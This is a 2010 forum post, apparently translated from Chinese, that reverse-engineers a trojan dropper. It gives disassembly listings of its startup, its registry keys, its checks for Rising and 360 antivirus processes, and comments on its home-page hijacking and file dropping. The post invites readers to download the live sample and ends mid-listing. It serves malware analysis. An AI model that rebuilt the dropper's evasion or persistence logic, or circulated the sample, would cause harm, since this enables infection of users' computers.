Trojan-Dropper.Win32.Ekafod.no (Kaspersky name)
Last edited by robey on 2010-7-10 13:12. I got this sample two days ago. I just ran it through online scanners and none of the domestic AV products detect it yet. If you see this post, feel free to download it and see whether your AV catches it! The sample has been uploaded.
Thanks to the person who knocked me down yesterday (myself); I stayed up until midnight last night writing this, to build some confidence. Since it is a brand-new virus I am posting it now; download it later and it will already be in the AV signature databases. My QQ: 591841426 (for learning and discussion only; if you are looking for cracks, please don't bother me).
Enough talk, let's begin.
The sample is not packed, is 256,144 bytes long, and was written in VC++ (it links MFC42, as the CString/CFile imports in the listings below show).
MD5: F5E39FD21E72F15A966F90AA35725B87
1. The entry point. This is the standard VC++ CRT startup code; the sample's own code starts at the call to 004017FE, which is WinMain.
00401660 >/$ 55 PUSH EBP //entry point: the debugger stops here after loading
00401661 |. 8BEC MOV EBP,ESP
00401663 |. 6A FF PUSH -1
00401665 |. 68 A8524000 PUSH 复件_123.004052A8
0040166A |. 68 5A164000 PUSH <JMP.&MSVCRT._except_handler3> ; install SEH handler
0040166F |. 64:A1 0000000>MOV EAX,DWORD PTR FS:
00401675 |. 50 PUSH EAX
00401676 |. 64:8925 00000>MOV DWORD PTR FS:,ESP
0040167D |. 83EC 68 SUB ESP,68
00401680 |. 53 PUSH EBX
00401681 |. 56 PUSH ESI
00401682 |. 57 PUSH EDI
00401683 |. 8965 E8 MOV DWORD PTR SS:,ESP
00401686 |. 33DB XOR EBX,EBX
00401688 |. 895D FC MOV DWORD PTR SS:,EBX
0040168B |. 6A 02 PUSH 2
0040168D |. FF15 50514000 CALL DWORD PTR DS:[<&MSVCRT.__set_app_ty>; msvcrt.__set_app_type
00401693 |. 59 POP ECX
00401694 |. 830D 10E64300>OR DWORD PTR DS:,FFFFFFFF
0040169B |. 830D 14E64300>OR DWORD PTR DS:,FFFFFFFF
004016A2 |. FF15 54514000 CALL DWORD PTR DS:[<&MSVCRT.__p__fmode>] ; msvcrt.__p__fmode
004016A8 |. 8B0D 04E64300 MOV ECX,DWORD PTR DS:
004016AE |. 8908 MOV DWORD PTR DS:,ECX
004016B0 |. FF15 58514000 CALL DWORD PTR DS:[<&MSVCRT.__p__commode>; msvcrt.__p__commode
004016B6 |. 8B0D 00E64300 MOV ECX,DWORD PTR DS:
004016BC |. 8908 MOV DWORD PTR DS:,ECX
004016BE |. A1 5C514000 MOV EAX,DWORD PTR DS:[<&MSVCRT._adjust_f>
004016C3 |. 8B00 MOV EAX,DWORD PTR DS:
004016C5 |. A3 0CE64300 MOV DWORD PTR DS:,EAX
004016CA |. E8 16010000 CALL 复件_123.004017E5
004016CF |. 391D 10E44300 CMP DWORD PTR DS:,EBX
004016D5 |. 75 0C JNZ SHORT 复件_123.004016E3
004016D7 |. 68 E2174000 PUSH 复件_123.004017E2
004016DC |. FF15 60514000 CALL DWORD PTR DS:[<&MSVCRT.__setusermat>; msvcrt.__setusermatherr
004016E2 |. 59 POP ECX
004016E3 |> E8 E8000000 CALL 复件_123.004017D0
004016E8 |. 68 1C604000 PUSH 复件_123.0040601C
004016ED |. 68 18604000 PUSH 复件_123.00406018
004016F2 |. E8 D3000000 CALL <JMP.&MSVCRT._initterm>
004016F7 |. A1 FCE54300 MOV EAX,DWORD PTR DS:
004016FC |. 8945 94 MOV DWORD PTR SS:,EAX
004016FF |. 8D45 94 LEA EAX,DWORD PTR SS:
00401702 |. 50 PUSH EAX
00401703 |. FF35 F8E54300 PUSH DWORD PTR DS:
00401709 |. 8D45 9C LEA EAX,DWORD PTR SS:
0040170C |. 50 PUSH EAX
0040170D |. 8D45 90 LEA EAX,DWORD PTR SS:
00401710 |. 50 PUSH EAX
00401711 |. 8D45 A0 LEA EAX,DWORD PTR SS:
00401714 |. 50 PUSH EAX
00401715 |. FF15 68514000 CALL DWORD PTR DS:[<&MSVCRT.__getmainarg>; msvcrt.__getmainargs
0040171B |. 68 14604000 PUSH 复件_123.00406014
00401720 |. 68 00604000 PUSH 复件_123.00406000
00401725 |. E8 A0000000 CALL <JMP.&MSVCRT._initterm>
0040172A |. 83C4 24 ADD ESP,24
0040172D |. A1 6C514000 MOV EAX,DWORD PTR DS:[<&MSVCRT._acmdln>]
00401732 |. 8B30 MOV ESI,DWORD PTR DS:
00401734 |. 8975 8C MOV DWORD PTR SS:,ESI
00401737 |. 803E 22 CMP BYTE PTR DS:,22
0040173A |. 75 3A JNZ SHORT 复件_123.00401776
0040173C |> 46 /INC ESI //CRT startup: skip the quoted module name in the command line; what is left becomes the lpCmdLine passed to WinMain
0040173D |. 8975 8C |MOV DWORD PTR SS:,ESI
00401740 |. 8A06 |MOV AL,BYTE PTR DS:
00401742 |. 3AC3 |CMP AL,BL
00401744 |. 74 04 |JE SHORT 复件_123.0040174A
00401746 |. 3C 22 |CMP AL,22
00401748 |.^ 75 F2 \JNZ SHORT 复件_123.0040173C //end of the loop
0040174A |> 803E 22 CMP BYTE PTR DS:,22
0040174D |. 75 04 JNZ SHORT 复件_123.00401753
0040174F |> 46 INC ESI
00401750 |. 8975 8C MOV DWORD PTR SS:,ESI
00401753 |> 8A06 MOV AL,BYTE PTR DS:
00401755 |. 3AC3 CMP AL,BL
00401757 |. 74 04 JE SHORT 复件_123.0040175D
00401759 |. 3C 20 CMP AL,20
0040175B |.^ 76 F2 JBE SHORT 复件_123.0040174F
0040175D |> 895D D0 MOV DWORD PTR SS:,EBX
00401760 |. 8D45 A4 LEA EAX,DWORD PTR SS:
00401763 |. 50 PUSH EAX ; /pStartupinfo
00401764 |. FF15 48504000 CALL DWORD PTR DS:[<&KERNEL32.GetStartup>; \GetStartupInfoA
0040176A |. F645 D0 01 TEST BYTE PTR SS:,1
0040176E |. 74 11 JE SHORT 复件_123.00401781
00401770 |. 0FB745 D4 MOVZX EAX,WORD PTR SS:
00401774 |. EB 0E JMP SHORT 复件_123.00401784
00401776 |> 803E 20 /CMP BYTE PTR DS:,20
00401779 |.^ 76 D8 |JBE SHORT 复件_123.00401753
0040177B |. 46 |INC ESI
0040177C |. 8975 8C |MOV DWORD PTR SS:,ESI
0040177F |.^ EB F5 \JMP SHORT 复件_123.00401776
00401781 |> 6A 0A PUSH 0A
00401783 |. 58 POP EAX
00401784 |> 50 PUSH EAX
00401785 |. 56 PUSH ESI
00401786 |. 53 PUSH EBX
00401787 |. 53 PUSH EBX ; /pModule
00401788 |. FF15 44504000 CALL DWORD PTR DS:[<&KERNEL32.GetModuleH>; \GetModuleHandleA
0040178E |. 50 PUSH EAX
0040178F |. E8 6A000000 CALL 复件_123.004017FE //the sample's own code: WinMain(hInstance, NULL, lpCmdLine, nCmdShow)
00401794 |. 8945 98 MOV DWORD PTR SS:,EAX
00401797 |. 50 PUSH EAX ; /status
00401798 |. FF15 70514000 CALL DWORD PTR DS:[<&MSVCRT.exit>] ; \exit
0040179E |. 8B45 EC MOV EAX,DWORD PTR SS:
004017A1 |. 8B08 MOV ECX,DWORD PTR DS:
004017A3 |. 8B09 MOV ECX,DWORD PTR DS:
004017A5 |. 894D 88 MOV DWORD PTR SS:,ECX
004017A8 |. 50 PUSH EAX
004017A9 |. 51 PUSH ECX
004017AA |. E8 15000000 CALL <JMP.&MSVCRT._XcptFilter>
004017AF |. 59 POP ECX
004017B0 |. 59 POP ECX
004017B1 \. C3 RETN
2. The main behaviour routine (the section numbers in the comments refer to the listings below)
0040443F .B8 5C194000 MOV EAX,复件_123.0040195C
00404444 .E8 A7D1FFFF CALL 复件_123.004015F0
00404449 .51 PUSH ECX
0040444A .56 PUSH ESI
0040444B .8D45 F0 LEA EAX,DWORD PTR SS:
0040444E .57 PUSH EDI
0040444F .50 PUSH EAX
00404450 .E8 93CEFFFF CALL 复件_123.004012E8
00404455 .59 POP ECX
00404456 .8365 FC 00 AND DWORD PTR SS:,0
0040445A .50 PUSH EAX
0040445B .B9 E4E54300 MOV ECX,复件_123.0043E5E4
00404460 .E8 43D1FFFF CALL <JMP.&MFC42.#858_??4CString@@QAEABV>
00404465 .834D FC FF OR DWORD PTR SS:,FFFFFFFF
00404469 .8D4D F0 LEA ECX,DWORD PTR SS:
0040446C .E8 3BD0FFFF CALL <JMP.&MFC42.#800_??1CString@@QAE@XZ>
00404471 .E8 8AEBFFFF CALL 复件_123.00403000 //create registry keys (section 3)
00404476 .E8 E4EFFFFF CALL 复件_123.0040345F //create registry keys (section 5)
0040447B .8B35 54504000 MOV ESI,DWORD PTR DS:[<&KERNEL32.Sleep>] ;kernel32.Sleep
00404481 .BF C8000000 MOV EDI,0C8
00404486 .57 PUSH EDI ; /Timeout => 200. ms
00404487 .FFD6 CALL ESI ; \Sleep //sleep 200 ms
00404489 .E8 72FBFFFF CALL 复件_123.00404000 //enumerate processes looking for ravmond.exe (section 7)
0040448E .85C0 TEST EAX,EAX
00404490 .74 0C JE SHORT 复件_123.0040449E
00404492 .E8 1CFEFFFF CALL 复件_123.004042B3
00404497 .E8 75FEFFFF CALL 复件_123.00404311
0040449C .EB 0E JMP SHORT 复件_123.004044AC
0040449E >E8 E6FEFFFF CALL 复件_123.00404389 //enumerate processes looking for 360tray.exe (section 8); if it is found, the JNZ below skips the home-page lock
004044A3 .85C0 TEST EAX,EAX
004044A5 .75 05 JNZ SHORT 复件_123.004044AC
004044A7 .E8 2EFDFFFF CALL 复件_123.004041DA //lock the IE home page to http://www.rom12580.cn (section 9); reached only when neither ravmond.exe nor 360tray.exe is running
004044AC >57 PUSH EDI
004044AD .FFD6 CALL ESI
004044AF .E8 16ECFFFF CALL 复件_123.004030CA //start dropping files (section 12)
004044B4 .E8 58EDFFFF CALL 复件_123.00403211 //create the directory and drop files (section 13)
004044B9 .A3 ECE54300 MOV DWORD PTR DS:,EAX
004044BE .E8 EEEEFFFF CALL 复件_123.004033B1 //drop iksii.dll (section 14)
004044C3 .57 PUSH EDI
004044C4 .FFD6 CALL ESI
004044C6 .E8 D6EDFFFF CALL 复件_123.004032A1 //inject into the rundll.exe process and run it
004044CB .BF E8030000 MOV EDI,3E8
004044D0 .57 PUSH EDI
004044D1 .FFD6 CALL ESI
004044D3 .E8 9FCBFFFF CALL 复件_123.00401077 //drop the virus body
004044D8 .57 PUSH EDI
004044D9 .FFD6 CALL ESI
004044DB .E8 C4FBFFFF CALL 复件_123.004040A4
004044E0 .8B4D F4 MOV ECX,DWORD PTR SS:
004044E3 .5F POP EDI
004044E4 .33C0 XOR EAX,EAX
004044E6 .5E POP ESI
004044E7 .64:890D 00000>MOV DWORD PTR FS:,ECX
004044EE .C9 LEAVE
004044EF .C3 RETN
3. Creating registry values
0040141D/$B8 8C184000 MOV EAX,复件_123.0040188C
00401422|.E8 C9010000 CALL 复件_123.004015F0
00401427|.83EC 0C SUB ESP,0C
0040142A|.8365 FC 00 AND DWORD PTR SS:,0
0040142E|.8D4D E8 LEA ECX,DWORD PTR SS:
00401431|.E8 C7FCFFFF CALL 复件_123.004010FD
00401436|.68 60E04300 PUSH 复件_123.0043E060 ;ASCII "SOFTWARE\Softfy\PlugName"
0040143B|.68 02000080 PUSH 80000002
00401440|.8D4D E8 LEA ECX,DWORD PTR SS:
00401443|.C645 FC 01 MOV BYTE PTR SS:,1
00401447|.E8 4BFDFFFF CALL 复件_123.00401197 //create the registry key (section 4)
0040144C|.85C0 TEST EAX,EAX
0040144E|.75 20 JNZ SHORT 复件_123.00401470
00401450|.FF75 08 PUSH DWORD PTR SS:
00401453|.8D4D E8 LEA ECX,DWORD PTR SS:
00401456|.68 54E04300 PUSH 复件_123.0043E054 ;ASCII "LogonName"
0040145B|.E8 BB0B0000 CALL 复件_123.0040201B //set the LogonName value
00401460|.FF75 08 PUSH DWORD PTR SS:
00401463|.8D4D E8 LEA ECX,DWORD PTR SS:
00401466|.68 44E04300 PUSH 复件_123.0043E044 ;ASCII "LogonMainName"
0040146B|.E8 AB0B0000 CALL 复件_123.0040201B //set the LogonMainName value
00401470|>8D4D E8 LEA ECX,DWORD PTR SS:
00401473|.E8 55FDFFFF CALL 复件_123.004011CD //close the key
00401478|.8065 FC 00 AND BYTE PTR SS:,0
0040147C|.8D4D E8 LEA ECX,DWORD PTR SS:
0040147F|.E8 AEFCFFFF CALL 复件_123.00401132
00401484|.834D FC FF OR DWORD PTR SS:,FFFFFFFF
00401488|.8D4D 08 LEA ECX,DWORD PTR SS:
0040148B|.E8 1C000000 CALL <JMP.&MFC42.#800_??1CString@@QAE@XZ>
00401490|.8B4D F4 MOV ECX,DWORD PTR SS:
00401493|.64:890D 00000>MOV DWORD PTR FS:,ECX
0040149A|.C9 LEAVE
0040149B\.C3 RETN
4. Creating the key HKEY_LOCAL_MACHINE\SOFTWARE\Softfy\PlugName. The routine at 00401197 is a generic RegCreateKeyExA wrapper that takes the root handle and subkey as arguments; section 3 calls it with 80000002 (HKEY_LOCAL_MACHINE) and the subkey above, and the key is opened with KEY_ALL_ACCESS.
00401197/$55 PUSH EBP
00401198|.8BEC MOV EBP,ESP
0040119A|.51 PUSH ECX
0040119B|.56 PUSH ESI ;复件_123.0043E5E8
0040119C|.8BF1 MOV ESI,ECX
0040119E|.FF75 0C PUSH DWORD PTR SS:
004011A1|.8D4E 08 LEA ECX,DWORD PTR DS:
004011A4|.E8 09030000 CALL <JMP.&MFC42.#860_??4CString@@QAEABV>
004011A9|.8D45 FC LEA EAX,DWORD PTR SS:
004011AC|.83C6 04 ADD ESI,4
004011AF|.50 PUSH EAX ; /pDisposition
004011B0|.33C0 XOR EAX,EAX ; |
004011B2|.56 PUSH ESI ; |pHandle
004011B3|.50 PUSH EAX ; |pSecurity => NULL
004011B4|.68 3F000F00 PUSH 0F003F ; |Access = KEY_ALL_ACCESS
004011B9|.50 PUSH EAX ; |Options => REG_OPTION_NON_VOLATILE
004011BA|.50 PUSH EAX ; |Class => NULL
004011BB|.50 PUSH EAX ; |Reserved => 0
004011BC|.FF75 0C PUSH DWORD PTR SS: ; |Subkey
004011BF|.FF75 08 PUSH DWORD PTR SS: ; |hKey
004011C2|.FF15 08504000 CALL DWORD PTR DS:[<&ADVAPI32.RegCreateK>; \RegCreateKeyExA
004011C8|.5E POP ESI
004011C9|.C9 LEAVE
004011CA\.C2 0800 RETN 8
5. More registry values (under SOFTWARE\Softfy\Plug, PlugDown, WebIni, LockPage and CSID)
0040345F/$B8 F8184000 MOV EAX,复件_123.004018F8
00403464|.E8 87E1FFFF CALL 复件_123.004015F0
00403469|.83EC 30 SUB ESP,30
0040346C|.53 PUSH EBX
0040346D|.56 PUSH ESI
0040346E|.8D4D C4 LEA ECX,DWORD PTR SS:
00403471|.E8 4AE1FFFF CALL <JMP.&MFC42.#354_??0CFile@@QAE@XZ>
00403476|.33DB XOR EBX,EBX
00403478|.8D4D E0 LEA ECX,DWORD PTR SS:
0040347B|.895D FC MOV DWORD PTR SS:,EBX
0040347E|.E8 1DE0FFFF CALL <JMP.&MFC42.#540_??0CString@@QAE@XZ>
00403483|.8D4D E4 LEA ECX,DWORD PTR SS:
00403486|.C645 FC 01 MOV BYTE PTR SS:,1
0040348A|.E8 11E0FFFF CALL <JMP.&MFC42.#540_??0CString@@QAE@XZ>
0040348F|.8D4D E8 LEA ECX,DWORD PTR SS:
00403492|.C645 FC 02 MOV BYTE PTR SS:,2
00403496|.E8 05E0FFFF CALL <JMP.&MFC42.#540_??0CString@@QAE@XZ>
0040349B|.8D4D EC LEA ECX,DWORD PTR SS:
0040349E|.C645 FC 03 MOV BYTE PTR SS:,3
004034A2|.E8 F9DFFFFF CALL <JMP.&MFC42.#540_??0CString@@QAE@XZ>
004034A7|.68 6CE24300 PUSH 复件_123.0043E26C ;ASCII "full80"
004034AC|.8D4D E4 LEA ECX,DWORD PTR SS:
004034AF|.C645 FC 04 MOV BYTE PTR SS:,4
004034B3|.E8 FADFFFFF CALL <JMP.&MFC42.#860_??4CString@@QAEABV>
004034B8|.68 68E24300 PUSH 复件_123.0043E268 ;ASCII "C2"
004034BD|.8D4D E8 LEA ECX,DWORD PTR SS:
004034C0|.E8 EDDFFFFF CALL <JMP.&MFC42.#860_??4CString@@QAEABV>
004034C5|.68 60E24300 PUSH 复件_123.0043E260 ;ASCII "1.0.1"
004034CA|.8D4D EC LEA ECX,DWORD PTR SS:
004034CD|.E8 E0DFFFFF CALL <JMP.&MFC42.#860_??4CString@@QAEABV>
004034D2|.8D4D D4 LEA ECX,DWORD PTR SS:
004034D5|.E8 23DCFFFF CALL 复件_123.004010FD
004034DA|.8D4D F0 LEA ECX,DWORD PTR SS:
004034DD|.C645 FC 05 MOV BYTE PTR SS:,5
004034E1|.E8 BADFFFFF CALL <JMP.&MFC42.#540_??0CString@@QAE@XZ>
004034E6|.68 44E24300 PUSH 复件_123.0043E244 ;ASCII " SOFTWARE\Softfy\Plug"
004034EB|.8D4D F0 LEA ECX,DWORD PTR SS:
004034EE|.C645 FC 06 MOV BYTE PTR SS:,6
004034F2|.E8 BBDFFFFF CALL <JMP.&MFC42.#860_??4CString@@QAEABV>
004034F7|.8D4D F0 LEA ECX,DWORD PTR SS:
004034FA|.E8 BBE0FFFF CALL <JMP.&MFC42.#6282_?TrimLeft@CString>
004034FF|.8D4D F0 LEA ECX,DWORD PTR SS:
00403502|.E8 ADE0FFFF CALL <JMP.&MFC42.#6283_?TrimRight@CStrin>
00403507|.FF75 F0 PUSH DWORD PTR SS:
0040350A|.BE 02000080 MOV ESI,80000002
0040350F|.8D4D D4 LEA ECX,DWORD PTR SS:
00403512|.56 PUSH ESI
00403513|.E8 7FDCFFFF CALL 复件_123.00401197 //create the registry key
00403518|.85C0 TEST EAX,EAX
0040351A|.75 7B JNZ SHORT 复件_123.00403597
0040351C|.FF75 E4 PUSH DWORD PTR SS:
0040351F|.8D4D D4 LEA ECX,DWORD PTR SS:
00403522|.68 34E24300 PUSH 复件_123.0043E234 ;ASCII "PlugUserName"
00403527|.E8 EFEAFFFF CALL 复件_123.0040201B //set registry value
0040352C|.FF75 E8 PUSH DWORD PTR SS:
0040352F|.8D4D D4 LEA ECX,DWORD PTR SS:
00403532|.68 24E24300 PUSH 复件_123.0043E224 ;ASCII "PlugSoftName"
00403537|.E8 DFEAFFFF CALL 复件_123.0040201B //set registry value
0040353C|.FF75 EC PUSH DWORD PTR SS:
0040353F|.8D4D D4 LEA ECX,DWORD PTR SS:
00403542|.68 18E24300 PUSH 复件_123.0043E218 ;ASCII "PlugSoftVer"
00403547|.E8 CFEAFFFF CALL 复件_123.0040201B //set registry value
0040354C|.53 PUSH EBX
0040354D|.68 0CE24300 PUSH 复件_123.0043E20C ;ASCII "PlugSendNum"
00403552|.8D4D D4 LEA ECX,DWORD PTR SS:
00403555|.E8 A6EAFFFF CALL 复件_123.00402000 //set registry value
0040355A|.53 PUSH EBX
0040355B|.68 00E24300 PUSH 复件_123.0043E200 ;ASCII "PlugStat"
00403560|.8D4D D4 LEA ECX,DWORD PTR SS:
00403563|.E8 98EAFFFF CALL 复件_123.00402000 //set registry value
00403568|.68 F8E14300 PUSH 复件_123.0043E1F8 ;ASCII "3.6.7"
0040356D|.68 ECE14300 PUSH 复件_123.0043E1EC ;ASCII "PlugUpdate"
00403572|.8D4D D4 LEA ECX,DWORD PTR SS:
00403575|.E8 A1EAFFFF CALL 复件_123.0040201B //set registry value
0040357A|.6A 01 PUSH 1
0040357C|.68 E4E14300 PUSH 复件_123.0043E1E4 ;ASCII "CoreDll"
00403581|.8D4D D4 LEA ECX,DWORD PTR SS:
00403584|.E8 77EAFFFF CALL 复件_123.00402000 //set registry value
00403589|.53 PUSH EBX
0040358A|.68 D8E14300 PUSH 复件_123.0043E1D8 ;ASCII "LoadNums"
0040358F|.8D4D D4 LEA ECX,DWORD PTR SS:
00403592|.E8 69EAFFFF CALL 复件_123.00402000 //set registry value
00403597|>57 PUSH EDI
00403598|.8D4D D4 LEA ECX,DWORD PTR SS:
0040359B|.E8 2DDCFFFF CALL 复件_123.004011CD //close the key
004035A0|.68 BCE14300 PUSH 复件_123.0043E1BC ;ASCII "SOFTWARE\Softfy\PlugDown"
004035A5|.56 PUSH ESI
004035A6|.8D4D D4 LEA ECX,DWORD PTR SS:
004035A9|.E8 E9DBFFFF CALL 复件_123.00401197 //the rest of the routine creates further keys and values in the same way
004035AE|.85C0 TEST EAX,EAX
004035B0|.BF B4E14300 MOV EDI,复件_123.0043E1B4 ;ASCII "1.0.0"
004035B5|.75 1C JNZ SHORT 复件_123.004035D3
004035B7|.57 PUSH EDI
004035B8|.68 ACE14300 PUSH 复件_123.0043E1AC ;ASCII "PlugOne"
004035BD|.8D4D D4 LEA ECX,DWORD PTR SS:
004035C0|.E8 56EAFFFF CALL 复件_123.0040201B
004035C5|.57 PUSH EDI
004035C6|.68 A4E14300 PUSH 复件_123.0043E1A4 ;ASCII "PlugTwo"
004035CB|.8D4D D4 LEA ECX,DWORD PTR SS:
004035CE|.E8 48EAFFFF CALL 复件_123.0040201B
004035D3|>8D4D D4 LEA ECX,DWORD PTR SS:
004035D6|.E8 F2DBFFFF CALL 复件_123.004011CD
004035DB|.68 8CE14300 PUSH 复件_123.0043E18C ;ASCII "SOFTWARE\Softfy\WebIni"
004035E0|.56 PUSH ESI
004035E1|.8D4D D4 LEA ECX,DWORD PTR SS:
004035E4|.E8 AEDBFFFF CALL 复件_123.00401197
004035E9|.85C0 TEST EAX,EAX
004035EB|.75 32 JNZ SHORT 复件_123.0040361F
004035ED|.57 PUSH EDI
004035EE|.68 80E14300 PUSH 复件_123.0043E180 ;ASCII "WebIniVer"
004035F3|.8D4D D4 LEA ECX,DWORD PTR SS:
004035F6|.E8 20EAFFFF CALL 复件_123.0040201B
004035FB|.E8 10010000 CALL 复件_123.00403710
00403600|.0FB7C0 MOVZX EAX,AX
00403603|.50 PUSH EAX
00403604|.68 70E14300 PUSH 复件_123.0043E170 ;ASCII "WebIniSection"
00403609|.8D4D D4 LEA ECX,DWORD PTR SS:
0040360C|.E8 EFE9FFFF CALL 复件_123.00402000
00403611|.53 PUSH EBX
00403612|.68 64E14300 PUSH 复件_123.0043E164 ;ASCII "HitProbaby"
00403617|.8D4D D4 LEA ECX,DWORD PTR SS:
0040361A|.E8 E1E9FFFF CALL 复件_123.00402000
0040361F|>8D4D D4 LEA ECX,DWORD PTR SS:
00403622|.E8 A6DBFFFF CALL 复件_123.004011CD
00403627|.68 48E14300 PUSH 复件_123.0043E148 ;ASCII "SOFTWARE\Softfy\LockPage"
0040362C|.56 PUSH ESI
0040362D|.8D4D D4 LEA ECX,DWORD PTR SS:
00403630|.E8 62DBFFFF CALL 复件_123.00401197
00403635|.85C0 TEST EAX,EAX
00403637|.5F POP EDI
00403638|.75 1C JNZ SHORT 复件_123.00403656
0040363A|.53 PUSH EBX
0040363B|.68 3CE14300 PUSH 复件_123.0043E13C ;ASCII "LockPageNum" //registry value name
00403640|.8D4D D4 LEA ECX,DWORD PTR SS:
00403643|.E8 B8E9FFFF CALL 复件_123.00402000
00403648|.53 PUSH EBX
00403649|.68 2CE14300 PUSH 复件_123.0043E12C ;ASCII "NeedLockPage" //registry value name
0040364E|.8D4D D4 LEA ECX,DWORD PTR SS:
00403651|.E8 AAE9FFFF CALL 复件_123.00402000
00403656|>8D4D D4 LEA ECX,DWORD PTR SS:
00403659|.E8 6FDBFFFF CALL 复件_123.004011CD
0040365E|.68 14E14300 PUSH 复件_123.0043E114 ;ASCII "SOFTWARE\Softfy\CSID" //registry key
00403663|.56 PUSH ESI
00403664|.8D4D D4 LEA ECX,DWORD PTR SS:
00403667|.E8 2BDBFFFF CALL 复件_123.00401197
0040366C|.85C0 TEST EAX,EAX
0040366E|.75 37 JNZ SHORT 复件_123.004036A7
00403670|.68 ECE04300 PUSH 复件_123.0043E0EC ;ASCII "{C4560D12-CE25-4A2E-A5D4-B5070FCBE282}"
00403675|.68 E4E04300 PUSH 复件_123.0043E0E4 ;ASCII "csid"
0040367A|.8D4D D4 LEA ECX,DWORD PTR SS:
0040367D|.E8 99E9FFFF CALL 复件_123.0040201B //write the csid value (home-page lock)
00403682|.FF35 E4E54300 PUSH DWORD PTR DS:
00403688|.8D4D D4 LEA ECX,DWORD PTR SS:
0040368B|.68 DCE04300 PUSH 复件_123.0043E0DC ;ASCII "dllname"
00403690|.E8 86E9FFFF CALL 复件_123.0040201B
00403695|.68 9CE04300 PUSH 复件_123.0043E09C ;ASCII "D:\ssshall"
0040369A|.68 D4E04300 PUSH 复件_123.0043E0D4 ;ASCII "dllpath"
0040369F|.8D4D D4 LEA ECX,DWORD PTR SS:
004036A2|.E8 74E9FFFF CALL 复件_123.0040201B
004036A7|>8D4D D4 LEA ECX,DWORD PTR SS:
004036AA|.E8 1EDBFFFF CALL 复件_123.004011CD //close the key
004036AF|.8D4D F0 LEA ECX,DWORD PTR SS:
004036B2|.C645 FC 05 MOV BYTE PTR SS:,5
004036B6|.E8 F1DDFFFF CALL <JMP.&MFC42.#800_??1CString@@QAE@XZ>
004036BB|.8D4D D4 LEA ECX,DWORD PTR SS:
004036BE|.C645 FC 04 MOV BYTE PTR SS:,4
004036C2|.E8 6BDAFFFF CALL 复件_123.00401132
004036C7|.8D4D EC LEA ECX,DWORD PTR SS:
004036CA|.C645 FC 03 MOV BYTE PTR SS:,3
004036CE|.E8 D9DDFFFF CALL <JMP.&MFC42.#800_??1CString@@QAE@XZ>
004036D3|.8D4D E8 LEA ECX,DWORD PTR SS:
004036D6|.C645 FC 02 MOV BYTE PTR SS:,2
004036DA|.E8 CDDDFFFF CALL <JMP.&MFC42.#800_??1CString@@QAE@XZ>
004036DF|.8D4D E4 LEA ECX,DWORD PTR SS:
004036E2|.C645 FC 01 MOV BYTE PTR SS:,1
004036E6|.E8 C1DDFFFF CALL <JMP.&MFC42.#800_??1CString@@QAE@XZ>
004036EB|.8D4D E0 LEA ECX,DWORD PTR SS:
004036EE|.885D FC MOV BYTE PTR SS:,BL
004036F1|.E8 B6DDFFFF CALL <JMP.&MFC42.#800_??1CString@@QAE@XZ>
004036F6|.834D FC FF OR DWORD PTR SS:,FFFFFFFF
004036FA|.8D4D C4 LEA ECX,DWORD PTR SS:
004036FD|.E8 ACDEFFFF CALL <JMP.&MFC42.#665_??1CFile@@UAE@XZ>
00403702|.8B4D F4 MOV ECX,DWORD PTR SS:
00403705|.5E POP ESI
00403706|.5B POP EBX
00403707|.64:890D 00000>MOV DWORD PTR FS:,ECX
0040370E|.C9 LEAVE
0040370F\.C3 RETN
6. Creating the key HKEY_LOCAL_MACHINE\SOFTWARE\Softfy\Plug. The subkey name is passed in from section 5 (the string " SOFTWARE\Softfy\Plug", trimmed) and the routine that creates it is the same RegCreateKeyExA wrapper at 00401197 already listed in section 4, so the listing is not repeated here.
7. Enumerate processes looking for ravmond.exe (Rising antivirus). Note that this routine only reports whether the process exists: it lowercases each szExeFile, does a substring search, and returns 1 on a match (leaving the snapshot handle open in that case). The calls at 004042B3 and 00404311 in section 2, which are not listed here, are what runs when it is found.
00404000/$B8 0C194000 MOV EAX,复件_123.0040190C
00404005|.E8 E6D5FFFF CALL 复件_123.004015F0
0040400A|.81EC 2C010000 SUB ESP,12C
00404010|.56 PUSH ESI
00404011|.8D4D F0 LEA ECX,DWORD PTR SS:
00404014|.E8 87D4FFFF CALL <JMP.&MFC42.#540_??0CString@@QAE@XZ>
00404019|.8365 FC 00 AND DWORD PTR SS:,0
0040401D|.6A 00 PUSH 0 ; /ProcessID = 0
0040401F|.6A 02 PUSH 2 ; |Flags = TH32CS_SNAPPROCESS
00404021|.E8 D2D7FFFF CALL <JMP.&KERNEL32.CreateToolhelp32Snap>; \CreateToolhelp32Snapshot //take a process snapshot to search through
00404026|.8BF0 MOV ESI,EAX
00404028|.8D85 C8FEFFFF LEA EAX,DWORD PTR SS:
0040402E|.50 PUSH EAX ; /pProcessentry
0040402F|.56 PUSH ESI ; |hSnapshot
00404030|.C785 C8FEFFFF>MOV DWORD PTR SS:,128 ; |
0040403A|.E8 B3D7FFFF CALL <JMP.&KERNEL32.Process32First> ; \Process32First
0040403F|>85C0 /TEST EAX,EAX
00404041|.74 3D |JE SHORT 复件_123.00404080
00404043|.8D85 ECFEFFFF |LEA EAX,DWORD PTR SS:
00404049|.8D4D F0 |LEA ECX,DWORD PTR SS:
0040404C|.50 |PUSH EAX
0040404D|.E8 60D4FFFF |CALL <JMP.&MFC42.#860_??4CString@@QAEAB>
00404052|.8D4D F0 |LEA ECX,DWORD PTR SS:
00404055|.E8 72D5FFFF |CALL <JMP.&MFC42.#4202_?MakeLower@CStri>
0040405A|.68 74E24300 |PUSH 复件_123.0043E274 ;ASCII "ravmond.exe"
0040405F|.8D4D F0 |LEA ECX,DWORD PTR SS:
00404062|.E8 5FD5FFFF |CALL <JMP.&MFC42.#2764_?Find@CString@@Q>
00404067|.83F8 FF |CMP EAX,-1
0040406A|.75 0F |JNZ SHORT 复件_123.0040407B
0040406C|.8D85 C8FEFFFF |LEA EAX,DWORD PTR SS:
00404072|.50 |PUSH EAX ; /pProcessentry
00404073|.56 |PUSH ESI ; |hSnapshot
00404074|.E8 73D7FFFF |CALL <JMP.&KERNEL32.Process32Next> ; \Process32Next
00404079|.^ EB C4 \JMP SHORT 复件_123.0040403F
0040407B|>6A 01 PUSH 1
0040407D|.5E POP ESI
0040407E|.EB 09 JMP SHORT 复件_123.00404089
00404080|>56 PUSH ESI ; /hObject
00404081|.FF15 60504000 CALL DWORD PTR DS:[<&KERNEL32.CloseHandl>; \CloseHandle
00404087|.33F6 XOR ESI,ESI
00404089|>834D FC FF OR DWORD PTR SS:,FFFFFFFF
0040408D|.8D4D F0 LEA ECX,DWORD PTR SS:
00404090|.E8 17D4FFFF CALL <JMP.&MFC42.#800_??1CString@@QAE@XZ>
00404095|.8B4D F4 MOV ECX,DWORD PTR SS:
00404098|.8BC6 MOV EAX,ESI
